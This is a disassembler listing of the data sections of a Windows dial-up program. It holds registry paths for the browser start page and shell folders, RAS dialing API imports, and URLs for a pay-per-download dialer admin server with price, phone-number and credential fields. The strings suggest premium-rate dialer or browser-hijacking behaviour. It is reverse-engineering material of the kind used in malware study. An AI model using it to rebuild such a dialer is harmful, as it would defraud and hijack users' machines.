aSoftwareMicr_1 db 'Software\Microsoft\Windows\CurrentVersion',0
; DATA XREF: .data:off_4120CC�o
align 4
aInternetprofil db 'InternetProfile',0 ; DATA XREF: .data:off_4120C8�o
aDefault db 'Default',0 ; DATA XREF: .data:off_4120C4�o
aRemoteaccess db 'RemoteAccess',0 ; DATA XREF: .data:off_4120C0�o
align 4
aStartPage db 'Start Page',0 ; DATA XREF: .data:004120BC�o
align 4
aSoftwareMicr_2 db 'Software\Microsoft\Internet Explorer\Main',0
; DATA XREF: .data:004120B8�o
align 4
aStartMenu db 'Start Menu',0 ; DATA XREF: .data:off_4120B4�o
align 10h
aDesktop db 'Desktop',0 ; DATA XREF: .data:004120B0�o
aSoftwareMicr_0 db 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0
; DATA XREF: .data:off_4120AC�o
byte_40F7F9 db 1 ; DATA XREF: WinMain(x,x,x,x)+1AE�r
; .text:00405C7F�r ...
db 1
byte_40F7FB db 1 ; DATA XREF: sub_403350:loc_403972�r
; WinMain(x,x,x,x)+128�r
align 10h
dword_40F800 dd 0 ; DATA XREF: sub_4065D0:loc_4065F0�r
dword_40F804 dd 12Ch ; DATA XREF: sub_4065D0:loc_40661A�r
dd 1, 12Dh, 2, 12Eh, 3, 12Fh, 4, 130h, 5, 131h, 6, 132h
dd 7, 133h, 8, 134h, 9, 135h, 0Ah, 136h, 0Bh, 137h, 0Ch
dd 138h, 0Dh, 139h, 0Eh, 13Ah, 0Fh, 13Bh, 10h, 13Ch, 11h
dd 13Dh, 12h, 13Eh, 13h, 13Fh, 14h, 140h, 15h, 141h, 16h
dd 142h, 17h, 143h, 1000h, 144h, 1001h, 145h, 1002h, 146h
dd 1003h, 147h, 1004h, 148h, 2000h, 149h, 2001h, 14Ah
aOpen db 'open',0 ; DATA XREF: sub_405BC0+B�o
; sub_405FB0+67�o ...
align 10h
aResourceLdNotF db 'resource %ld not found',0 ; DATA XREF: sub_405D70+37�o
align 4
aLasterror db '&lasterror=',0 ; DATA XREF: sub_406210+10F�o
aLinenumber db '&linenumber=',0 ; DATA XREF: sub_406210+F0�o
align 4
aErrorFatalFile db 'error=fatal&filename=',0 ; DATA XREF: sub_406210+D1�o
align 4
asc_40F94C: ; DATA XREF: sub_406210+C2�o
unicode 0, <&>,0
a?: ; DATA XREF: sub_406210+BB�o
; sub_406390+14B�o ...
unicode 0, <?>,0
aS db '%s',0 ; DATA XREF: sub_4065D0+BC�o
align 4
aCc db 'cc',0 ; DATA XREF: sub_4066F0+81F�o
; sub_407980+86�o ...
align 4
aPrice2 db 'price2',0 ; DATA XREF: sub_4066F0+809�o
; sub_406FE0+42E�o
align 4
aPrice1 db 'price1',0 ; DATA XREF: sub_4066F0+7F0�o
; sub_406FE0+4B7�o
align 4
aPhonenumber2 db 'phonenumber2',0 ; DATA XREF: sub_4066F0+7D3�o
; sub_406FE0+415�o ...
align 4
aPhonenumber1 db 'phonenumber1',0 ; DATA XREF: sub_4066F0+7B6�o
; sub_406FE0+49E�o ...
align 4
; char aXx[]
aXx db 'XX',0 ; DATA XREF: sub_4066F0+5D5�o
align 10h
; char aXx_0[]
aXx_0 db 'xx',0 ; DATA XREF: sub_4066F0+5BE�o
; sub_406FE0+3C0�o ...
align 4
; char aCountrycode[]
aCountrycode db 'countrycode',0 ; DATA XREF: sub_4066F0+2C7�o
; char aPrice[]
aPrice db 'price',0 ; DATA XREF: sub_4066F0+272�o
; sub_406FE0+24F�o
align 4
; char aRealnumber[]
aRealnumber db 'realnumber',0 ; DATA XREF: sub_4066F0+20C�o
; sub_406FE0+21A�o
align 4
; char aCall[]
aCall db 'call',0 ; DATA XREF: sub_4066F0+1D9�o
; sub_406FE0+1E7�o
align 4
; char aCallrecords_0[]
aCallrecords_0 db '/callrecords',0 ; DATA XREF: sub_4066F0+1BB�o
; sub_406FE0+1C9�o
align 4
; char Str1[]
Str1 db 'callrecords',0 ; DATA XREF: sub_4066F0+194�o
; sub_406FE0+1A2�o
aHttpPrs_payp_0 db 'http://prs.payperdownload.nl/radius/dialer_admin/geoip.asp',0
; DATA XREF: sub_4066F0+74�o
align 4
aDel db 'del',0 ; DATA XREF: sub_4066F0+53�o
; sub_406FE0+50�o
aHttpPrs_payper db 'http://prs.payperdownload.nl',0 ; DATA XREF: sub_4066F0+14�o
; sub_4066F0+3C�o ...
align 4
aHttpPrs_payp_1 db 'http://prs.payperdownload.nl/radius/dialer_admin/geoip2.asp?cc=',0
; DATA XREF: sub_406FE0+7A�o
aPrefix db 'Prefix',0 ; DATA XREF: sub_407750+83�o
; sub_407820+86�o ...
align 10h
aIsdn db 'isdn',0 ; DATA XREF: sub_407D40+3F1�o
; sub_409AD0+44�o
align 4
aModem db 'modem',0 ; DATA XREF: sub_407D40+3E1�o
; sub_409AD0+34�o
align 10h
a_Bsdmaindlg_cp db '.\BsdMainDlg.cpp',0 ; DATA XREF: sub_407D40+340�o
align 4
aDialDS db 'Dial: %d - %s',0 ; DATA XREF: sub_408350+243�o
align 4
aUpdateentryDS db 'UpdateEntry: %d - %s',0 ; DATA XREF: sub_408350+1F9�o
align 4
aConnecttime db 'connecttime',0 ; DATA XREF: sub_408B20+12F�o
; sub_408CF0+10F�o
aPassword2 db 'password2',0 ; DATA XREF: sub_408B20+E3�o
; sub_408CF0+F5�o
align 4
aPassword1 db 'password1',0 ; DATA XREF: sub_408B20+CA�o
; sub_408CF0+DC�o
align 10h
aUsername2 db 'username2',0 ; DATA XREF: sub_408B20+AD�o
; sub_408CF0+C3�o
align 4
aUsername1 db 'username1',0 ; DATA XREF: sub_408B20+90�o
; sub_408CF0+B3�o
align 4
aSerial db 'serial',0 ; DATA XREF: sub_408B20+73�o
; sub_408CF0+93�o
align 10h
aVersion db 'version',0 ; DATA XREF: sub_408B20+50�o
; sub_408CF0+73�o
a2_0 db '2.0',0 ; DATA XREF: sub_409050+6�o
; sub_409050+26�o
asc_40FB1C: ; DATA XREF: sub_409530+173�o
unicode 0, < >,0
asc_40FB20: ; DATA XREF: sub_4096E0+35�o
; sub_409730+3B�o
unicode 0, <,>,0
aRassetentrydia db 'RasSetEntryDialParamsA',0 ; DATA XREF: sub_4099A0+A6�o
align 4
aRasgetconnects db 'RasGetConnectStatusA',0 ; DATA XREF: sub_4099A0+9C�o
align 4
aRasenumconnect db 'RasEnumConnectionsA',0 ; DATA XREF: sub_4099A0+86�o
aRashangupa db 'RasHangUpA',0 ; DATA XREF: sub_4099A0+76�o
align 4
aRassetentrypro db 'RasSetEntryPropertiesA',0 ; DATA XREF: sub_4099A0+6C�o
align 4
aRasgetentrypro db 'RasGetEntryPropertiesA',0 ; DATA XREF: sub_4099A0+56�o
align 4
aRasgeterrorstr db 'RasGetErrorStringA',0 ; DATA XREF: sub_4099A0+46�o
align 4
aRasdiala db 'RasDialA',0 ; DATA XREF: sub_4099A0+3C�o
align 4
aRasenumdevices db 'RasEnumDevicesA',0 ; DATA XREF: sub_4099A0+2C�o
aRasapi32_dll db 'RASAPI32.DLL',0 ; DATA XREF: sub_4099A0:loc_4099B0�o
align 4
aShgetfolderpat db 'SHGetFolderPathA',0 ; DATA XREF: sub_409FE0+1A�o
align 4
aShfolder_dll db 'SHFolder.dll',0 ; DATA XREF: sub_40A3B0+31�o
align 4
aShell32_dll db 'Shell32.dll',0 ; DATA XREF: sub_40A3B0+13�o
a2x db '%%%2x',0 ; DATA XREF: sub_40A4B0+64�o
align 4
dd offset aS_0 ; "S"
dd offset aM ; "M"
dd offset aD ; "D"
dd offset aB ; "B"
dd offset aVal ; "Val"
dd offset aForceremove ; "ForceRemove"
dd offset aNoremove ; "NoRemove"
dd offset aDelete ; "Delete"
dword_40FC3C dd 214EEh, 0 ; DATA XREF: sub_40A110+C�o
dd 0C0h, 46000000h
dword_40FC4C dd 21401h, 0 ; DATA XREF: sub_40A110+15�o
dd 0C0h, 46000000h
dword_40FC5C dd 2E005h, 0 ; DATA XREF: sub_402B60+5F�o
dd 0C0h, 46000000h
dword_40FC6C dd 0 ; DATA XREF: sub_402B60+25�r
dword_40FC70 dd 0 ; DATA XREF: sub_402B60+30�r
dword_40FC74 dd 0 ; DATA XREF: sub_402B60+3B�r
dword_40FC78 dd 0 ; DATA XREF: sub_402B60+46�r
dword_40FC7C dd 10Bh, 0 ; DATA XREF: sub_40A110+3D�o
dd 0C0h, 46000000h, 0B62F5910h, 11D16528h, 1196h, 0D0D1EF8h
dword_40FC9C dd 394C3DE0h, 11D23C6Fh, 0C0007B81h, 0B77A794Fh ; DATA XREF: sub_40A645+84�o
aCorexitprocess db 'CorExitProcess',0 ; DATA XREF: unknown_libname_1+F�o
align 4
aMscoree_dll db 'mscoree.dll',0 ; DATA XREF: unknown_libname_1�o
stru_40FCC8 _msEH <0FFFFFFFFh, offset loc_40B589, offset loc_40B59D>
; DATA XREF: start+2�o
align 8
stru_40FCD8 _msEH <0FFFFFFFFh, offset sub_40B5E0, offset sub_40B5E4>
; DATA XREF: sub_40B5F4-2F�o
align 8
stru_40FCE8 _msEH <0FFFFFFFFh, offset loc_40CB3A, offset loc_40CB3E>
; DATA XREF: sub_40CB0D+2�o
align 8
stru_40FCF8 _msEH <0FFFFFFFFh, offset loc_40CB7E, offset loc_40CB82>
; DATA XREF: sub_40CB51+2�o
dd 41h dup(0)
asc_40FE08: ; DATA XREF: .data:off_412278�o
unicode 0, < ((((( H>
dw 10h
dd 7 dup(100010h), 5 dup(840084h), 3 dup(100010h), 810010h
dd 2 dup(810081h), 10081h, 9 dup(10001h), 100001h, 2 dup(100010h)
dd 820010h, 2 dup(820082h), 20082h, 9 dup(20002h), 100002h
dd 100010h, 200010h, 40h dup(0)
dword_410008 dd 200000h, 4 dup(200020h), 280068h, 280028h, 200028h
; DATA XREF: .data:0041227C�o
dd 8 dup(200020h), 480020h, 7 dup(100010h), 840010h, 4 dup(840084h)
dd 100084h, 3 dup(100010h), 3 dup(1810181h), 0Ah dup(1010101h)
dd 3 dup(100010h), 3 dup(1820182h), 0Ah dup(1020102h)
dd 2 dup(100010h), 10h dup(200020h), 480020h, 8 dup(100010h)
dd 140010h, 100014h, 2 dup(100010h), 100014h, 2 dup(100010h)
dd 1010010h, 0Bh dup(1010101h), 1010010h, 3 dup(1010101h)
dd 0Ch dup(1020102h), 1020010h, 3 dup(1020102h), 1010102h
dd 746E7572h, 20656D69h, 6F727265h, 2072h, 0A0Dh, 534F4C54h
dd 72652053h, 0D726F72h, 0Ah, 474E4953h, 72726520h, 0A0D726Fh
dd 0
aDomainError db 'DOMAIN error',0Dh,0Ah,0
align 10h
aR6029ThisAppli db 'R6029',0Dh,0Ah
db '- This application cannot run using the active version of the Mic'
db 'rosoft .NET Runtime',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 4
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aThisApplicatio db 0Dh,0Ah
db 'This application has requested the Runtime to terminate it in an '
db 'unusual way.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 10h
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .data:off_412294�o
db '- floating point not loaded',0Dh,0Ah,0
align 10h
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: __NMSG_WRITE+123�o
; ___security_error_handler+132�o
align 4
; char asc_4105D8[]
asc_4105D8 db 0Ah ; DATA XREF: __NMSG_WRITE+107�o
; ___security_error_handler+FC�o
db 0Ah,0
align 4
; char aRuntimeErrorPr[]
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: __NMSG_WRITE+F5�o
db 0Ah
db 'Program: ',0
align 4
; char Source[]
Source db '...',0 ; DATA XREF: __NMSG_WRITE+C1�o
; ___security_error_handler+CC�o
; char aProgramNameUnk[]
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: __NMSG_WRITE+8E�o
; ___security_error_handler+8B�o
align 4
; char aProgram[]
aProgram db 'Program: ',0 ; DATA XREF: ___security_error_handler+108�o
align 10h
aABufferOverrun db 'A buffer overrun has been detected which has corrupted the progra'
; DATA XREF: ___security_error_handler+62�o
db 'm',27h,'s',0Ah
db 'internal state. The program cannot safely continue execution and'
db ' must',0Ah
db 'now be terminated.',0Ah,0
aBufferOverrunD db 'Buffer overrun detected!',0
; DATA XREF: ___security_error_handler:loc_40D737�o
align 10h
aASecurityError db 'A security error of unknown cause has been detected which has',0Ah
; DATA XREF: ___security_error_handler+4C�o
db 'corrupted the program',27h,'s internal state. The program cannot sa'
db 'fely',0Ah
db 'continue execution and must now be terminated.',0Ah,0
align 4
; char aUnknownSecurit[]
aUnknownSecurit db 'Unknown security failure detected!',0
; DATA XREF: ___security_error_handler+47�o
align 4
stru_4107B8 _msEH <0FFFFFFFFh, offset loc_40D712, offset loc_40D716>
; DATA XREF: ___security_error_handler+5�o
dword_4107C4 dd 0 ; DATA XREF: ___crtGetStringTypeA+1E�o
; ___crtLCMapStringA+1C�o
stru_4107C8 _msEH <0FFFFFFFFh, offset loc_40D8FB, offset loc_40D8FF>
; DATA XREF: ___crtGetStringTypeA+2�o
aGetprocesswind db 'GetProcessWindowStation',0 ; DATA XREF: ___crtMessageBoxA+73�o
aGetuserobjecti db 'GetUserObjectInformationA',0 ; DATA XREF: ___crtMessageBoxA+62�o
align 4
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: ___crtMessageBoxA+47�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: ___crtMessageBoxA+3F�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: ___crtMessageBoxA+2E�o
aUser32_dll db 'user32.dll',0 ; DATA XREF: ___crtMessageBoxA+13�o
align 8
stru_410848 _msEH <0FFFFFFFFh, offset loc_40E1AC, offset loc_40E1B0>
; DATA XREF: ___convertcp+2�o
align 8
stru_410858 _msEH <0FFFFFFFFh, offset loc_40E617, offset loc_40E61B>
; DATA XREF: ___crtLCMapStringA+2�o
dd 0FFFFFFFFh, 40E414h, 40E418h, 0FFFFFFFFh, 40E4E2h, 40E4E6h
dd 0
dd 48h, 0Eh dup(0)
dd offset dword_4120F8
dd offset dword_4108D0
dd 2, 2 dup(0)
dword_4108D0 dd 0A8B0h, 0A988h, 0 ; DATA XREF: .rdata:004108C0�o
dword_4108DC dd 2 dup(0) ; DATA XREF: sub_40CB0D+C�o
; sub_40CB0D:loc_40CB20�o
dword_4108E4 dd 2 dup(0) ; DATA XREF: sub_40CB51+C�o
; sub_40CB51:loc_40CB64�o
dword_4108EC dd 0 ; DATA XREF: sub_40A5B8+1D�o
; sub_40A5B8+24�o ...
dd 10BE4h, 2 dup(0)
dd 10CA6h, 0F240h, 109CCh, 2 dup(0)
dd 11018h, 0F028h, 10B60h, 2 dup(0)
dd 11236h, 0F1BCh, 109A4h, 2 dup(0)
dd 112DEh, 0F000h, 10B4Ch, 2 dup(0)
dd 1130Eh, 0F1A8h, 10C00h, 2 dup(0)
dd 113C6h, 0F25Ch, 10B1Ch, 2 dup(0)
dd 113D0h, 0F178h, 10B58h, 2 dup(0)
dd 113F4h, 0F1B4h, 5 dup(0)
dd 11272h, 11252h, 11242h, 11284h, 11294h, 112A6h, 112BAh
dd 112CAh, 11264h, 0
dd 10CECh, 10CF6h, 10D08h, 10D1Ah, 10D2Ah, 10D40h, 10D56h
dd 10D62h, 10D74h, 10D8Ch, 10DA4h, 10DC0h, 10DD8h, 10DEAh
dd 10DFAh, 10E0Ah, 10E1Ah, 10E2Ah, 10E42h, 10E5Ah, 10E6Eh
dd 10E7Ah, 10E8Ch, 10E98h, 10EA4h, 10EB0h, 10EBCh, 10ECCh
dd 10EDCh, 10EF4h, 10F00h, 10F0Ch, 10F22h, 10F2Eh, 10F44h
dd 10F52h, 10F5Eh, 10F6Ah, 10CD6h, 10F96h, 10FA8h, 10FB6h
dd 10FC8h, 10FDCh, 10FE4h, 10FF6h, 11008h, 114E8h, 114DAh
dd 114CCh, 114BEh, 114ACh, 11492h, 1147Eh, 1146Ah, 1145Ch
dd 1144Eh, 11442h, 11432h, 114F4h, 11422h, 11412h, 11400h
dd 11500h, 11510h, 1152Ch, 11546h, 1155Eh, 11578h, 11592h
dd 115A4h, 115B2h, 115CCh, 10CC0h, 10CB2h, 115DCh, 115F2h
dd 11604h, 11616h, 11622h, 1162Eh, 10F80h, 1163Eh, 0
dd 800000A3h, 80000139h, 80000095h, 80000096h, 80000007h
dd 80000004h, 80000002h, 80000006h, 80000115h, 800000BAh
dd 800000A1h, 0
dd 112ECh, 112FEh, 0
dd 113DEh, 0
dd 1115Eh, 11152h, 1117Ch, 11192h, 111A4h, 111B2h, 111C0h
dd 111D0h, 111E2h, 111F0h, 111FCh, 1120Ah, 11218h, 11226h
dd 1116Ah, 11140h, 11130h, 11120h, 110FEh, 110E8h, 110DCh
dd 110C8h, 110BAh, 110A6h, 11092h, 1107Ch, 11068h, 1105Ah
dd 11048h, 1103Ch, 11026h, 11110h, 0
dd 10C28h, 10C52h, 10C66h, 10C76h, 10C8Ah, 10C3Eh, 0
dd 11348h, 1135Ah, 1131Ah, 1136Ah, 1137Eh, 11392h, 113A4h
dd 113B6h, 11330h, 0
db 69h ; i
align 2
aInternetcloseh db 'InternetCloseHandle',0
db '',0
aInternetreadfi db 'InternetReadFile',0
align 2
aU_0 db '',0
aInternetopenur db 'InternetOpenUrlA',0
align 2
aT db '',0
aInternetopena db 'InternetOpenA',0
aA db 'a',0
aInternetautodi db 'InternetAutodial',0
align 2
aF db 'f',0
aInternetcheckc db 'InternetCheckConnectionA',0
align 2
aWininet_dll db 'WININET.dll',0
a__0 db '.',0
aClosehandle db 'CloseHandle',0
db 83h ;
db 3, 57h, 61h
aItforsingleobj db 'itForSingleObject',0
dw 21Fh
aInterlockedexc db 'InterlockedExchange',0
dd 654700F5h, 50434174h, 16C0000h, 4C746547h, 6C61636Fh
dd 666E4965h, 416Fh, 654701D0h, 72685474h, 4C646165h, 6C61636Fh
dd 1DF0065h, 56746547h, 69737265h, 78456E6Fh, 26B0041h
aMultibytetowid db 'MultiByteToWideChar',0
db 87h ;
db 3, 57h, 69h
aDechartomultib db 'deCharToMultiByte',0
dw 3BDh
aLstrlenw db 'lstrlenW',0
align 2
dw 29Bh
aRaiseexception db 'RaiseException',0
align 4
aP db '',0
aEntercriticals db 'EnterCriticalSection',0
align 4
db 47h ; G
db 2, 4Ch, 65h
aAvecriticalsec db 'aveCriticalSection',0
align 4
db 19h
db 2, 49h, 6Eh
aItializecritic db 'itializeCriticalSection',0
aZ db 'z',0
aDeletecritical db 'DeleteCriticalSection',0
dd 69530346h, 666F657Ah, 6F736552h, 65637275h, 25B0000h
dd 6B636F4Ch, 6F736552h, 65637275h, 24D0000h, 64616F4Ch
dd 6F736552h, 65637275h, 0DA0000h, 646E6946h, 6F736552h
dd 65637275h, 1690041h, 4C746547h, 45747361h, 726F7272h
dd 21E0000h
aInterlockeddec db 'InterlockedDecrement',0
align 2
aC_0 db '',0
aFlushinstructi db 'FlushInstructionCache',0
dw 13Ah
aGetcurrentproc db 'GetCurrentProcess',0
dw 20Ch
aHeapfree db 'HeapFree',0
align 2
dw 19Bh
aGetprocessheap db 'GetProcessHeap',0
align 4
db 6
db 2, 48h, 65h
aApalloc db 'apAlloc',0
db 0BCh ;
db 3, 6Ch, 73h
aTrlena db 'trlenA',0
align 4
db 0B3h ;
db 3, 6Ch, 73h
aTrcmpia db 'trcmpiA',0
db 9
db 3, 53h, 65h
aTevent db 'tEvent',0
align 4
aI db 'i',0
aCreatethread db 'CreateThread',0
align 4
aI_0 db 'I',0
aCreateeventa db 'CreateEventA',0
align 4
db 22h ; "
db 2, 49h, 6Eh
aTerlockedincre db 'terlockedIncrement',0
align 4
db 0B9h ;
db 3, 6Ch, 73h
aTrcpyna db 'trcpynA',0
db 0B6h ;
db 3, 6Ch, 73h
aTrcpya db 'trcpyA',0
align 4
db 75h ; u
db 1, 47h, 65h
aTmodulefilenam db 'tModuleFileNameA',0
align 2
dw 3ADh
aLstrcata db 'lstrcatA',0
align 2
dw 13Eh
aGetcurrentthre db 'GetCurrentThreadId',0
align 4
db '|',0
aDeletefilea db 'DeleteFileA',0
db '=',0
aCopyfilea db 'CopyFileA',0
dw 3B0h
aLstrcmpa db 'lstrcmpA',0
align 2
dw 30Ch
aSetfileattribu db 'SetFileAttributesA',0
align 10h
db 56h ; V
db 1, 47h, 65h
aTfileattribute db 'tFileAttributesA',0
align 2
dw 22Dh
aIsdbcsleadbyte db 'IsDBCSLeadByte',0
align 4
aQ db '',0
aFreelibrary db 'FreeLibrary',0
dw 249h
aLoadlibraryexa db 'LoadLibraryExA',0
align 4
dd 65470177h, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 6C530347h
dd 706565h, 65470108h, 6D6F4374h, 646E616Dh, 656E694Ch
dd 1980041h, 50746547h, 41636F72h, 65726464h, 7373h, 6F4C0248h
dd 694C6461h, 72617262h, 4179h, 4E52454Bh, 32334C45h, 6C6C642Eh
dd 2040000h
aPostthreadmess db 'PostThreadMessageA',0
align 4
db '*',0
aCharnexta db 'CharNextA',0
db 80h ;
db 2, 53h, 65h
aTwindowlonga db 'tWindowLongA',0
align 2
dw 292h
aShowwindow db 'ShowWindow',0
align 4
db 0B3h ;
db 2, 55h, 6Eh
aRegisterclassa db 'registerClassA',0
align 4
aU_1 db 'U',0
aCreatedialogpa db 'CreateDialogParamA',0
align 2
aB_0 db '',0
aDispatchmessag db 'DispatchMessageA',0
align 2
dw 1A1h
aIsdialogmessag db 'IsDialogMessageA',0
align 2
dw 13Ah
aGetmessagea db 'GetMessageA',0
db 0Eh
db 1, 47h, 65h
aTdesktopwindow db 'tDesktopWindow',0
align 4
db 56h ; V
db 2, 53h, 65h
aTfocus db 'tFocus',0
align 4
db 57h ; W
db 2, 53h, 65h
aTforegroundwin db 'tForegroundWindow',0
dw 16Eh
aGetwindowlonga db 'GetWindowLongA',0
align 10h
db 0FEh ;
align 2
aGetclassword db 'GetClassWord',0
align 10h
aS_1 db '',0
aDestroywindow db 'DestroyWindow',0
db 3Bh ; ;
db 2, 53h, 65h
aNdmessagea db 'ndMessageA',0
align 10h
db 86h ;
db 2, 53h, 65h
aTwindowtexta db 'tWindowTextA',0
align 2
dw 27Ah
aSettimer db 'SetTimer',0
align 2
dw 1B4h
aKilltimer db 'KillTimer',0
dw 113h
aGetdlgitemtext db 'GetDlgItemTextA',0
db 36h ; 6
db 2, 53h, 65h
aNddlgitemmessa db 'ndDlgItemMessageA',0
dw 253h
aSetdlgitemtext db 'SetDlgItemTextA',0
dd 65470111h, 676C4474h, 6D657449h, 1DE0000h, 7373654Dh
dd 42656761h, 41786Fh, 6F500201h, 654D7473h, 67617373h
dd 4165h, 6F500203h, 75517473h, 654D7469h, 67617373h, 2D80065h
dd 70737677h, 746E6972h, 4166h, 737702D6h, 6E697270h, 416674h
dd 6F4C01CAh, 74536461h, 676E6972h, 0DE0041h, 6D756E45h
dd 646E6957h, 73776Fh, 6F4C01BFh, 6D496461h, 41656761h
dd 0C40000h, 62616E45h, 6957656Ch, 776F646Eh, 53550000h
dd 32335245h, 6C6C642Eh, 1D00000h, 44676552h, 74656C65h
dd 79654B65h, 1D20041h, 44676552h, 74656C65h, 6C615665h
dd 416575h, 655201C9h, 6F6C4367h, 654B6573h, 1CD0079h
dd 43676552h, 74616572h, 79654B65h, 417845h, 655201E2h
dd 65704F67h, 79654B6Eh, 417845h, 655201F9h, 74655367h
dd 756C6156h, 41784565h, 1E70000h, 51676552h, 79726575h
dd 6F666E49h, 4179654Bh, 1D60000h, 45676552h, 4B6D756Eh
dd 78457965h, 1EC0041h, 51676552h, 79726575h, 756C6156h
dd 41784565h, 44410000h, 49504156h, 642E3233h, 6C6Ch, 4853007Eh
dd 6E616843h, 6F4E6567h, 79666974h, 1060000h, 6C656853h
dd 6578456Ch, 65747563h, 48530041h, 334C4C45h, 6C642E32h
dd 5B006Ch
aCorevokeclasso db 'CoRevokeClassObject',0
aO db 'O',0
aCoregisterclas db 'CoRegisterClassObject',0
aC_1 db 'c',0
aCotaskmemalloc db 'CoTaskMemAlloc',0
align 2
aD_0 db 'd',0
aCotaskmemfree db 'CoTaskMemFree',0
aE db 'e',0
aCotaskmemreall db 'CoTaskMemRealloc',0
align 2
dw 10h
aCocreateinstan db 'CoCreateInstance',0
align 2
dw 134h
aStringfromguid db 'StringFromGUID2',0
db 'h',0
aCouninitialize db 'CoUninitialize',0
align 2
db ':',0
aCoinitialize db 'CoInitialize',0
align 2
aOle32_dll db 'ole32.dll',0
aOleaut32_dll db 'OLEAUT32.dll',0
align 2
db ')',0
aPathfindextens db 'PathFindExtensionA',0
align 4
aShlwapi_dll db 'SHLWAPI.dll',0
dd 69560379h, 61757472h, 6F72506Ch, 74636574h, 3730000h
dd 74726956h, 416C6175h, 636F6C6Ch, 1BB0000h, 53746547h
dd 65747379h, 666E496Dh, 37B006Fh, 74726956h, 516C6175h
dd 79726575h, 2CA0000h, 556C7452h, 6E69776Eh, 2100064h
dd 70616548h, 6C416552h, 636F6Ch, 784500AFh, 72507469h
dd 7365636Fh, 34F0073h, 6D726554h, 74616E69h, 6F725065h
dd 73736563h, 450000h, 61657243h, 69446574h, 74636572h
dd 4179726Fh, 1C00000h
aGetsystemtimea db 'GetSystemTimeAsFileTime',0
db 0AFh ;
db 1, 47h, 65h
aTstartupinfoa db 'tStartupInfoA',0
dw 20Ah
aHeapdestroy db 'HeapDestroy',0
db 8
db 2, 48h, 65h
aApcreate db 'apCreate',0
align 2
dw 376h
aVirtualfree db 'VirtualFree',0
db 12h
db 2, 48h, 65h
aApsize db 'apSize',0
align 4
db 94h ;
db 3, 57h, 72h
aItefile db 'iteFile',0
db 0B1h ;
db 1, 47h, 65h
aTstdhandle db 'tStdHandle',0
align 10h
db 60h ; `
db 3, 55h, 6Eh
aHandledexcepti db 'handledExceptionFilter',0
align 4
aA_0 db '',0
aFreeenvironmen db 'FreeEnvironmentStringsA',0
dw 14Dh
aGetenvironment db 'GetEnvironmentStrings',0
aU_2 db '',0
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
db 4Fh ; O
db 1, 47h, 65h
aTenvironmentst db 'tEnvironmentStringsW',0
align 2
dw 317h
aSethandlecount db 'SetHandleCount',0
align 4
dd 6547015Eh, 6C694674h, 70795465h, 2970065h
aQueryperforman db 'QueryPerformanceCounter',0
db 0D5h ;
db 1, 47h, 65h
aTtickcount db 'tTickCount',0
align 4
db 3Bh ; ;
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcessId',0
dw 1B2h
aGetstringtypea db 'GetStringTypeA',0
align 4
dd 654701B5h, 72745374h, 54676E69h, 57657079h, 18B0000h
dd 4F746547h, 50434D45h, 0FC0000h, 43746547h, 666E4950h
dd 23A006Fh, 614D434Ch, 72745370h, 41676E69h, 23B0000h
dd 614D434Ch, 72745370h, 57676E69h
db 2 dup(0)
_rdata ends
; Section 3. (virtual address 00012000)
; Virtual size : 00000B5C ( 2908.)
; Section size in file : 00000B5C ( 2908.)
; Offset to raw data for section: 00012000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 412000h
dword_412000 dd 0 ; DATA XREF: __cinit+45�o
dd offset ___security_init_cookie
dd offset sub_40E979
dd offset loc_40E98F
dd offset sub_40E900
dd offset sub_40E930
dword_412018 dd 0 ; DATA XREF: __cinit+4C�o
dword_41201C dd 0 ; DATA XREF: __cinit+12�o
dd offset ___onexitinit
dd offset ___inittime
dd offset ___initmbctable
dword_41202C dd 0 ; DATA XREF: __cinit+17�o
dword_412030 dd 0 ; DATA XREF: _doexit:loc_40AD77�o
dword_412034 dd 0 ; DATA XREF: _doexit+6C�o
dword_412038 dd 0 ; DATA XREF: _doexit:loc_40AD96�o
dword_41203C dd 0 ; DATA XREF: _doexit+8B�o
off_412040 dd offset sub_4011A0 ; DATA XREF: .text:004011E1�o
; .text:004011EC�r ...
dword_412044 dd 0 ; DATA XREF: .text:00404B52�o
; WinMain(x,x,x,x)+18E�o ...
dword_412048 dd 7 dup(0) ; DATA XREF: sub_40E900�o
; void *dword_412064
dword_412064 dd 0 ; DATA XREF: sub_40E979+98�r
; sub_40E979+AC�w
dword_412068 dd 0 ; DATA XREF: sub_40E979:loc_40EA2B�w
dword_41206C dd 0 ; DATA XREF: sub_40E979+B8�w
off_412070 dd offset off_40F590 ; DATA XREF: WinMain(x,x,x,x)+26�o
